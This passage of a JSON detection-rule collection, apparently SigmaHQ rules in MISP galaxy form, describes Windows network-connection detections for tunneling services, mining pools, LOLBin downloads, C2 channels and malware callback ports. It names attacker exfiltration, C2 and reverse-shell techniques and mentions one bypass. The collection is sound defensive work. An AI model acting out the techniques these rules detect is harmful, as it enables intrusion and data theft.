"net_connection_win_susp_file_sharing_domains_susp_folders.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", "https://twitter.com/M_haggis/status/1032799638213066752", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://twitter.com/M_haggis/status/900741347035889665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "value": "Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder" }, { "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_wuauclt_network_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://dtm.uk/wuauclt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", "value": "Potentially Suspicious Wuauclt Network Connection" }, { "description": "Detects a network connection that is initiated by the \"notepad.exe\" process.\nThis might be a sign of process injection from a beacon process or something similar.\nNotepad rarely initiates a network communication except when printing documents for example.\n", "meta": { "author": "EagleEye Team", "creation_date": "2020-05-14", "falsepositive": [ "Printing documents via notepad might cause communication with the printer via port 9100 or similar." ], "filename": "net_connection_win_notepad.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", "https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", "value": "Network Connection Initiated Via Notepad.EXE" }, { "description": "Detects \"RegAsm.exe\" initiating a network connection to public IP adresses", "meta": { "author": "frack113", "creation_date": "2024-04-25", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_regasm_network_activity.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/", "https://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regasm_network_activity.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.009" ] }, "related": [ { "dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0531e43a-d77d-47c2-b89f-5fe50321c805", "value": "RegAsm.EXE Initiating Network Connection To Public IP" }, { "description": "Detects outbound network connection initiated by Microsoft Dialer.\nThe Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.\nThis is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is \"Rhadamanthys\"\n", "meta": { "author": "CertainlyP", "creation_date": "2024-04-26", "falsepositive": [ "In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives." ], "filename": "net_connection_win_dialer_initiated_connection.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d", "https://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html", "https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/", "https://tria.ge/240301-rk34sagf5x/behavioral2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dialer_initiated_connection.yml" ], "tags": [ "attack.execution", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37e4024a-6c80-4d8f-b95d-2e7e94f3a8d1", "value": "Outbound Network Connection Initiated By Microsoft Dialer" }, { "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-03", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_binary_no_cmdline.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "20384606-a124-4fec-acbb-8bd373728613", "value": "Suspicious Network Connection Binary No CommandLine" }, { "description": "Detects an executable initiating a network connection to \"ngrok\" domains.\nAttackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\nWhile communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-16", "falsepositive": [ "Legitimate use of the ngrok service." ], "filename": "net_connection_win_domain_ngrok.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://ngrok.com/blog-post/new-ngrok-domains", "https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf", "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://ngrok.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18249279-932f-45e2-b37a-8925f2597670", "value": "Process Initiated Network Connection To Ngrok Domain" }, { "description": "Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.\n", "meta": { "author": "@kostastsale", "creation_date": "2024-01-26", "falsepositive": [ "ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives." ], "filename": "net_connection_win_adws_unusual_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/FalconForceTeam/FalconFriday/blob/master/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md", "https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_adws_unusual_connection.yml" ], "tags": [ "attack.discovery", "attack.t1087" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3ad3c0f-c949-47a1-a30e-b0491ccae876", "value": "Uncommon Connection to Active Directory Web Services" }, { "description": "Detects initiated network connections to crypto mining pools", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Unlikely" ], "filename": "net_connection_win_domain_crypto_mining_pools.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.poolwatch.io/coin/monero", "https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt", "https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_crypto_mining_pools.yml" ], "tags": [ "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", "value": "Network Communication With Crypto Mining Pool" }, { "description": "Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.\nAn initial baseline is required before using this utility to exclude third party RDP tooling that you might use.\n", "meta": { "author": "Markus Neis", "creation_date": "2019-05-15", "falsepositive": [ "Third party RDP tools" ], "filename": "net_connection_win_rdp_outbound_over_non_standard_tools.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", "value": "Outbound RDP Connections Over Non-Standard Tools" }, { "description": "Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.\n", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Web Browsers and third party application might generate similar activity. An initial baseline is required." ], "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Rubeus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" ], "tags": [ "attack.credential-access", "attack.t1558", "attack.lateral-movement", "attack.t1550.003" ] }, "related": [ { "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", "value": "Uncommon Outbound Kerberos Connection" }, { "description": "Detects an initiated network connection by a non browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-24", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_domain_azurewebsites.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia", "https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/", "https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_azurewebsites.yml" ], "tags": [ "attack.command-and-control", "attack.t1102", "attack.t1102.001" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5c80b618-0dbb-46e6-acbb-03d90bcb6d83", "value": "Network Connection Initiated To AzureWebsites.NET By Non-Browser Process" }, { "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-20", "falsepositive": [ "Legitimate use of the API with a tool that the author wasn't aware of" ], "filename": "net_connection_win_domain_dropbox_api.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_dropbox_api.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", "value": "Suspicious Dropbox API Usage" }, { "description": "Detects an executable initiating a network connection to \"ngrok\" tunneling domains.\nAttackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\nWhile communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-03", "falsepositive": [ "Legitimate use of the ngrok service." ], "filename": "net_connection_win_domain_ngrok_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok_tunnel.yml" ], "tags": [ "attack.exfiltration", "attack.command-and-control", "attack.t1567", "attack.t1568.002", "attack.t1572", "attack.t1090", "attack.t1102", "attack.s0508" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", "value": "Communication To Ngrok Tunneling Service Initiated" }, { "description": "Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\n", "meta": { "author": "Andreas Braathen (mnemonic.io)", "creation_date": "2024-06-17", "falsepositive": [ "Legitimate use of the LocaltoNet service." ], "filename": "net_connection_win_domain_localtonet_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications", "https://localtonet.com/documents/supported-tunnels", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_localtonet_tunnel.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.t1090", "attack.t1102" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ab65069-d82a-4d44-a759-466661a082d1", "value": "Communication To LocaltoNet Tunneling Service Initiated" }, { "description": "Detects network connections to BTunnels domains initiated by a process on the system.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Kamran Saifullah", "creation_date": "2024-09-13", "falsepositive": [ "Legitimate use of BTunnels will also trigger this." ], "filename": "net_connection_win_domain_btunnels.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_btunnels.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e02c8ec-02b9-43e8-81eb-34a475ba7965", "value": "Network Connection Initiated To BTunnels Domains" }, { "description": "Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.\nThis could potentially indicates a remote PowerShell connection.\n", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-09-12", "falsepositive": [ "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", "Network Service user name of a not-covered localization" ], "filename": "net_connection_win_susp_remote_powershell_session.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_remote_powershell_session.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", "value": "Potential Remote PowerShell Session Initiated" }, { "description": "Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.\n", "meta": { "author": "@d4ns4n_ (Wuerth-Phoenix)", "creation_date": "2024-09-02", "falsepositive": [ "Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally)." ], "filename": "net_connection_win_remote_access_tools_anydesk_incoming_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", "https://asec.ahnlab.com/en/40263/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_access_tools_anydesk_incoming_connection.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d58ba5c6-0ed7-4b9d-a433-6878379efda9", "value": "Remote Access Tool - AnyDesk Incoming Connection" }, { "description": "Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_malware_callback_port.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1571" ] }, "related": [ { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", "value": "Potentially Suspicious Malware Callback Communication" }, { "description": "Detects network connections from the Equation Editor process \"eqnedt32.exe\".", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-04-14", "falsepositive": [ "Unlikely" ], "filename": "net_connection_win_eqnedt.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/", "https://twitter.com/forensicitguy/status/1513538712986079238", "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" ], "tags": [ "attack.execution", "attack.t1203" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "value": "Network Connection Initiated By Eqnedt32.EXE" }, { "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", "meta": { "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-24", "falsepositive": [ "Legitimate use of the external websites for troubleshooting or network monitoring" ], "filename": "net_connection_win_domain_external_ip_lookup.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_external_ip_lookup.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", "value": "Suspicious Network Connection to IP Lookup Service APIs" }, { "description": "Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", "value": "Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location" }, { "description": "Detects a \"winlogon.exe\" process that initiate network communications with public IP addresses", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "creation_date": "2023-04-28", "falsepositive": [ "Communication to other corporate systems that use IP addresses from public address spaces" ], "filename": "net_connection_win_winlogon_net_connections.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.command-and-control", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7610a4ea-c06d-495f-a2ac-0a696abcfd3b", "value": "Outbound Network Connection To Public IP Via Winlogon" }, { "description": "Detects a network connection initiated by the certutil.exe utility.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-09-02", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_certutil_initiated_connection.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil_initiated_connection.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", "value": "Uncommon Network Connection Initiated By Certutil.EXE" }, { "description": "Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.\nIn this context attackers leverage known websites such as \"facebook\", \"youtube\", etc. In order to pass through undetected.\n", "meta": { "author": "Sorina Ionescu, X__Junior (Nextron Systems)", "creation_date": "2022-08-17", "falsepositive": [ "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.", "Ninite contacting githubusercontent.com" ], "filename": "net_connection_win_domain_dead_drop_resolvers.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/", "https://github.com/kleiton0x00/RedditC2", "https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al", "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://twitter.com/kleiton0x7e/status/1600567316810551296", "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_dead_drop_resolvers.yml" ], "tags": [ "attack.command-and-control", "attack.t1102", "attack.t1102.001" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", "value": "New Connection Initiated To Potential Dead Drop Resolver Domain" }, { "description": "Detects a network connection initiated by \"wordpad.exe\" over uncommon destination ports.\nThis might indicate potential process injection activity from a beacon or similar mechanisms.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-12", "falsepositive": [ "Other ports can be used, apply additional filters accordingly" ], "filename": "net_connection_win_wordpad_uncommon_ports.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wordpad_uncommon_ports.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control" ] }, "uuid": "786cdae8-fefb-4eb2-9227-04e34060db01", "value": "Suspicious Wordpad Outbound Connections" }, { "description": "Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Likely" ], "filename": "raw_access_thread_susp_disk_access_using_uncommon_tools.yml", "level": "low", "logsource.category": "raw_access_thread", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml" ], "tags": [ "attack.defense-evasion", "attack.t1006" ] }, "related": [ { "dest-uuid": 